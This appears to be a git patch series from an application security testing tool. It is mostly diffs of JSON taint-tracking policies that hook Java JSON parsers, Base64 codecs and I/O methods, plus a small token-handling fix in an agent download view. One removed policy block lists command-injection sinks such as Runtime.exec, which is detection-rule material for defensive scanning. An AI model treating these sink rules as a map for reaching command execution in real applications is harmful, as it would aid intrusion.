"ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldFloatArray(char[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldFloatArray2(char[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldInt(char[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldIntArray(char[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldLong(char[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldString(char[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.scanFieldFloat(char[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "P4", + "track": "false", + "untags": [], + "value": "com.alibaba.fastjson.util.IOUtils.decodeUTF8(byte[],int,int,char[])" + } + ], + "enable": 1, + "type": 1, + "value": "com.alibaba.fastjson" + }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.fasterxml.jackson.core.JsonFactory.createParser(byte[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.fasterxml.jackson.core.JsonFactory.createParser(byte[],int,int)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.fasterxml.jackson.core.JsonFactory.createParser(java.io.DataInput)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.fasterxml.jackson.core.JsonFactory.createParser(java.io.InputStream)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "source": "P1", "stack_blacklist": [], - "tags": [ - "html-decoded" - ], + "tags": [], "target": "R", "track": "false", - "untags": [ - "html-encoded" - ], - "value": "org.apache.commons.lang3.StringEscapeUtils.unescapeHtml3(java.lang.String)" + "untags": [], + "value": "com.fasterxml.jackson.core.JsonFactory.createParser(java.io.Reader)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "source": "P1", "stack_blacklist": [], - "tags": [ - "html-decoded" - ], + "tags": [], "target": "R", "track": "false", - "untags": [ - "html-encoded" - ], - "value": "org.apache.commons.lang3.StringEscapeUtils.unescapeHtml4(java.lang.String)" + "untags": [], + "value": "com.fasterxml.jackson.core.JsonFactory.createParser(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], - "tags": [ - "xml-decoded" - ], + "tags": [], "target": "R", "track": "false", - "untags": [ - "xml-encoded" - ], - "value": "org.apache.commons.lang3.StringEscapeUtils.unescapeXml(java.lang.String)" + "untags": [], + "value": "com.fasterxml.jackson.core.JsonParser.getBinaryValue(com.fasterxml.jackson.core.Base64Variant)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], - "tags": [ - "xml-encoded" - ], + "tags": [], "target": "R", "track": "false", - "untags": [ - "xml-decoded" - ], - "value": "org.apache.taglibs.standard.tag.common.core.Util.escapeXml(java.lang.String)" - } - ], - "enable": 1, - "type": 1, - "value": "apache-filter" - }, - { - "details": [ + "untags": [], + "value": "com.fasterxml.jackson.core.JsonParser.getCurrentName()" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "java.util.Base64$Decoder.decode(byte[])" + "value": "com.fasterxml.jackson.core.JsonParser.getParsingContext()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "P2", - "track": "", + "target": "R", + "track": "false", "untags": [], - "value": "java.util.Base64$Decoder.decode(byte[],byte[])" + "value": "com.fasterxml.jackson.core.JsonParser.getText()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "", + "target": "P1", + "track": "false", "untags": [], - "value": "java.util.Base64$Decoder.decode(java.lang.String)" + "value": "com.fasterxml.jackson.core.JsonParser.getText(java.io.Writer)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "java.util.Base64$Decoder.decode(java.nio.ByteBuffer)" + "value": "com.fasterxml.jackson.core.JsonParser.getTextCharacters()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "org.apache.commons.codec.binary.Base64.decode(byte[],int,int,org.apache.commons.codec.binary.BaseNCodec$Context)" + "value": "com.fasterxml.jackson.core.JsonParser.getValueAsString()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "org.apache.commons.codec.binary.Base64.decodeBase64(byte[])" + "value": "com.fasterxml.jackson.core.JsonParser.getValueAsString(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "org.apache.commons.codec.binary.Base64.decodeBase64(java.lang.String)" + "value": "com.fasterxml.jackson.core.JsonParser.nextFieldName()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "org.apache.commons.codec.binary.Base64.decodeInteger(byte[])" + "value": "com.fasterxml.jackson.core.JsonParser.nextTextValue()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "org.apache.commons.codec.binary.BaseNCodec.decode(byte[])" + "value": "com.fasterxml.jackson.core.JsonStreamContext.getCurrentName()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "all", "source": "P1", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "org.apache.commons.codec.binary.BaseNCodec.decode(java.lang.Object)" + "value": "com.fasterxml.jackson.databind.JsonDeserializer.deserialize(com.fasterxml.jackson.core.JsonParser,com.fasterxml.jackson.databind.DeserializationContext)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "org.apache.commons.codec.binary.BaseNCodec.decode(java.lang.String)" - } - ], - "enable": 1, - "type": 1, - "value": "base64-dec" - }, - { - "details": [ + "value": "com.fasterxml.jackson.databind.JsonNode.asText()" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "java.util.Base64$Encoder.encode(byte[])" + "value": "com.fasterxml.jackson.databind.JsonNode.asToken()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "P2", - "track": "", + "target": "R", + "track": "false", "untags": [], - "value": "java.util.Base64$Encoder.encode(byte[],byte[])" + "value": "com.fasterxml.jackson.databind.JsonNode.binaryValue()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "java.util.Base64$Encoder.encode(java.nio.ByteBuffer)" + "value": "com.fasterxml.jackson.databind.JsonNode.deepCopy()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "java.util.Base64$Encoder.encodeToString(byte[])" + "value": "com.fasterxml.jackson.databind.JsonNode.elements()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "org.apache.commons.codec.binary.Base64.encodeBase64(byte[])" + "value": "com.fasterxml.jackson.databind.JsonNode.fieldNames()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "org.apache.commons.codec.binary.Base64.encodeBase64(byte[],boolean)" + "value": "com.fasterxml.jackson.databind.JsonNode.fields()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "org.apache.commons.codec.binary.Base64.encodeBase64(byte[],boolean,boolean)" + "value": "com.fasterxml.jackson.databind.JsonNode.findPath(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "org.apache.commons.codec.binary.Base64.encodeBase64(byte[],boolean,boolean,int)" + "value": "com.fasterxml.jackson.databind.JsonNode.findValue(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "org.apache.commons.codec.binary.BaseNCodec.encode(byte[])" + "value": "com.fasterxml.jackson.databind.JsonNode.findValues(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "org.apache.commons.codec.binary.BaseNCodec.encode(byte[],int,int)" + "value": "com.fasterxml.jackson.databind.JsonNode.findValues(java.lang.String,java.util.List)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "org.apache.commons.codec.binary.BaseNCodec.encode(java.lang.Object)" + "value": "com.fasterxml.jackson.databind.JsonNode.findValuesAsText(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "org.apache.commons.codec.binary.BaseNCodec.encodeAsString(byte[])" + "value": "com.fasterxml.jackson.databind.JsonNode.findValuesAsText(java.lang.String,java.util.List)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], - "value": "org.apache.commons.codec.binary.BaseNCodec.encodeToString(byte[])" - } - ], - "enable": 1, - "type": 1, - "value": "base64-enc" - }, - { - "details": [ + "value": "com.fasterxml.jackson.databind.JsonNode.get(int)" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "java.awt.Desktop.browse(java.net.URI)" + "value": "com.fasterxml.jackson.databind.JsonNode.get(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "java.lang.ProcessImpl.start(java.lang.String[],java.util.Map,java.lang.String,boolean)" + "value": "com.fasterxml.jackson.databind.JsonNode.iterator()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1,2", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "java.lang.ProcessImpl.start(java.lang.String[],java.util.Map,java.lang.String,java.lang.ProcessBuilder$Redirect[],boolean)" + "value": "com.fasterxml.jackson.databind.JsonNode.path(int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "java.lang.Runtime.exec(java.lang.String)" + "value": "com.fasterxml.jackson.databind.JsonNode.path(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1,2", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "java.lang.Runtime.exec(java.lang.String,java.lang.String[])" + "value": "com.fasterxml.jackson.databind.JsonNode.textValue()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1,2", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "java.lang.Runtime.exec(java.lang.String,java.lang.String[],java.io.File)" + "value": "com.fasterxml.jackson.databind.JsonNode.toString()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "java.lang.Runtime.exec(java.lang.String[])" + "value": "com.fasterxml.jackson.databind.JsonNode.traverse()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1,2", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "java.lang.Runtime.exec(java.lang.String[],java.lang.String[])" + "value": "com.fasterxml.jackson.databind.JsonNode.with(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1,2", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "java.lang.Runtime.exec(java.lang.String[],java.lang.String[],java.io.File)" - } - ], - "enable": 1, - "type": 4, - "value": "cmd-injection" - }, - { - "details": [ + "value": "com.fasterxml.jackson.databind.JsonNode.withArray(java.lang.String)" + }, { "command": "", "ignore_blacklist": false, @@ -3066,199 +4319,192 @@ "source": "P1", "stack_blacklist": [], "tags": [], - "target": "P2", + "target": "R", "track": "false", "untags": [], - "value": "com.alibaba.fastjson.parser.DefaultJSONParser.(java.lang.Object,com.alibaba.fastjson.parser.JSONLexer,com.alibaba.fastjson.parser.ParserConfig)" + "value": "com.fasterxml.jackson.databind.ObjectMapper.createDeserializationContext(com.fasterxml.jackson.core.JsonParser,com.fasterxml.jackson.databind.DeserializationConfig)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "O", + "target": "R", "track": "false", "untags": [], - "value": "com.alibaba.fastjson.parser.DefaultJSONParser.(java.lang.String,com.alibaba.fastjson.parser.ParserConfig,int)" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(byte[],int,int,java.lang.Class)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "all", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "R", "track": "false", "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldBigInteger(char[])" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(com.fasterxml.jackson.core.JsonParser,com.fasterxml.jackson.core.type.TypeReference)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "all", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "R", "track": "false", "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldDate(char[])" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(com.fasterxml.jackson.core.JsonParser,com.fasterxml.jackson.databind.JavaType)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "all", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "R", "track": "false", "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldDecimal(char[])" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(com.fasterxml.jackson.core.JsonParser,java.lang.Class)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "O", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "R", "track": "false", "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldDouble(char[])" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.io.InputStream,com.fasterxml.jackson.databind.JavaType)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "all", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "R", "track": "false", "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldFloatArray(char[])" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.io.InputStream,java.lang.Class)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "all", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "R", "track": "false", "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldFloatArray2(char[])" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.io.Reader,com.fasterxml.jackson.core.type.TypeReference)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "all", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "R", "track": "false", "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldInt(char[])" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.io.Reader,com.fasterxml.jackson.databind.JavaType)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "all", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "R", "track": "false", "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldIntArray(char[])" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.lang.String,com.fasterxml.jackson.databind.JavaType)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "all", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "R", "track": "false", "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldLong(char[])" + "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.lang.String,java.lang.Class)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "all", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "R", "track": "false", "untags": [], - "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldString(char[])" + "value": "com.fasterxml.jackson.databind.deser.ValueInstantiator.createUsingDefault(com.fasterxml.jackson.databind.DeserializationContext)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "all", - "source": "O", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "R", "track": "false", "untags": [], - "value": "com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer.scanFieldFloat(char[])" + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(byte[],int,int,java.lang.Class)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "P4", + "target": "R", "track": "false", "untags": [], - "value": "com.alibaba.fastjson.util.IOUtils.decodeUTF8(byte[],int,int,char[])" - } - ], - "enable": 1, - "type": 1, - "value": "com.alibaba.fastjson" - }, - { - "details": [ + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(byte[],int,int,org.codehaus.jackson.type.JavaType)" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "source": "P1", "stack_blacklist": [], "tags": [], "target": "R", "track": "false", "untags": [], - "value": "com.fasterxml.jackson.core.JsonFactory.createParser(java.io.InputStream)" + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(byte[],int,int,org.codehaus.jackson.type.TypeReference)" }, { "command": "", @@ -3271,33 +4517,33 @@ "target": "R", "track": "false", "untags": [], - "value": "com.fasterxml.jackson.databind.JsonDeserializer.deserialize(com.fasterxml.jackson.core.JsonParser,com.fasterxml.jackson.databind.DeserializationContext)" + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(byte[],java.lang.Class)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "source": "P1", "stack_blacklist": [], "tags": [], "target": "R", "track": "false", "untags": [], - "value": "com.fasterxml.jackson.databind.ObjectMapper.createDeserializationContext(com.fasterxml.jackson.core.JsonParser,com.fasterxml.jackson.databind.DeserializationConfig)" + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(byte[],org.codehaus.jackson.type.JavaType)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "source": "P1", "stack_blacklist": [], "tags": [], "target": "R", "track": "false", "untags": [], - "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.io.InputStream,com.fasterxml.jackson.databind.JavaType)" + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(byte[],org.codehaus.jackson.type.TypeReference)" }, { "command": "", @@ -3310,7 +4556,7 @@ "target": "R", "track": "false", "untags": [], - "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.io.InputStream,java.lang.Class)" + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(java.io.InputStream,java.lang.Class)" }, { "command": "", @@ -3323,7 +4569,7 @@ "target": "R", "track": "false", "untags": [], - "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.lang.String,com.fasterxml.jackson.databind.JavaType)" + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(java.lang.String,java.lang.Class)" }, { "command": "", @@ -3336,7 +4582,7 @@ "target": "R", "track": "false", "untags": [], - "value": "com.fasterxml.jackson.databind.ObjectMapper.readValue(java.lang.String,java.lang.Class)" + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(java.lang.String,org.codehaus.jackson.type.JavaType)" }, { "command": "", @@ -3349,7 +4595,7 @@ "target": "R", "track": "false", "untags": [], - "value": "com.fasterxml.jackson.databind.deser.ValueInstantiator.createUsingDefault(com.fasterxml.jackson.databind.DeserializationContext)" + "value": "org.codehaus.jackson.map.ObjectMapper.readValue(java.lang.String,org.codehaus.jackson.type.TypeReference)" } ], "enable": 1, @@ -3358,6 +4604,32 @@ }, { "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.google.gson.Gson.fromJson(java.io.Reader,java.lang.Class)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.google.gson.Gson.fromJson(java.lang.String,java.lang.Class)" + }, { "command": "", "ignore_blacklist": false, @@ -4714,6 +5986,19 @@ "untags": [], "value": "java.io.InputStream.(java.io.InputStream)" }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "P1", + "track": "false", + "untags": [], + "value": "java.io.InputStream.read(byte[])" + }, { "command": "", "ignore_blacklist": false, @@ -4727,6 +6012,19 @@ "untags": [], "value": "java.io.InputStream.read(byte[],int,int)" }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "P1", + "track": "false", + "untags": [], + "value": "java.io.InputStream.transferTo(java.io.OutputStream)" + }, { "command": "", "ignore_blacklist": false, @@ -4740,6 +6038,19 @@ "untags": [], "value": "java.io.InputStreamReader.(java.io.InputStream)" }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "O", + "track": "false", + "untags": [], + "value": "java.io.InputStreamReader.(java.io.InputStream,java.lang.String)" + }, { "command": "", "ignore_blacklist": false, @@ -4792,6 +6103,19 @@ "untags": [], "value": "java.io.PipedInputStream.read(byte[],int,int)" }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "O", + "track": "false", + "untags": [], + "value": "java.io.PipedInputStream.receive(byte[],int,int)" + }, { "command": "INSERT(0,P2,P3)", "ignore_blacklist": false, @@ -4805,6 +6129,19 @@ "untags": [], "value": "java.io.PipedReader.read(char[],int,int)" }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "O", + "track": "false", + "untags": [], + "value": "java.io.PipedReader.receive(char[],int,int)" + }, { "command": "", "ignore_blacklist": false, @@ -4844,6 +6181,19 @@ "untags": [], "value": "java.io.Reader.read(char[])" }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "P1", + "track": "false", + "untags": [], + "value": "java.io.Reader.transferTo(java.io.Writer)" + }, { "command": "", "ignore_blacklist": false, From 1904c2db96b8d1efdad6e97e791e84d60166e29d Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Fri, 15 Sep 2023 16:05:19 +0800 Subject: [PATCH 109/114] fix:project_agent_download_token --- dongtai_protocol/views/agent_download.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/dongtai_protocol/views/agent_download.py b/dongtai_protocol/views/agent_download.py index a78cea863..12f2132cb 100644 --- a/dongtai_protocol/views/agent_download.py +++ b/dongtai_protocol/views/agent_download.py @@ -342,6 +342,8 @@ def get(self, request): user_token = request.query_params.get("token", None) if department_token: final_token = department_token + elif request.user.using_project is not None: + token = request.user.using_project.token elif not user_token: token, success = Token.objects.get_or_create(user=request.user) final_token = token.key From 8d97700fd72fc0297c1ccfe5fc29416d90870da4 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Fri, 15 Sep 2023 16:56:34 +0800 Subject: [PATCH 110/114] feat: update new strategy. --- static/data/go_full_policy.json | 2 +- static/data/go_hooktype.json | 92 +- static/data/go_policy.json | 20 + static/data/java_full_policy.json | 49 +- static/data/java_hooktype.json | 169 +- static/data/java_policy.json | 2772 +++++++++++++++++++-------- static/data/php_hooktype.json | 92 +- static/data/python_full_policy.json | 4 +- static/data/python_hooktype.json | 92 +- static/data/python_policy.json | 222 +++ static/data/vul_strategy.json | 220 ++- 11 files changed, 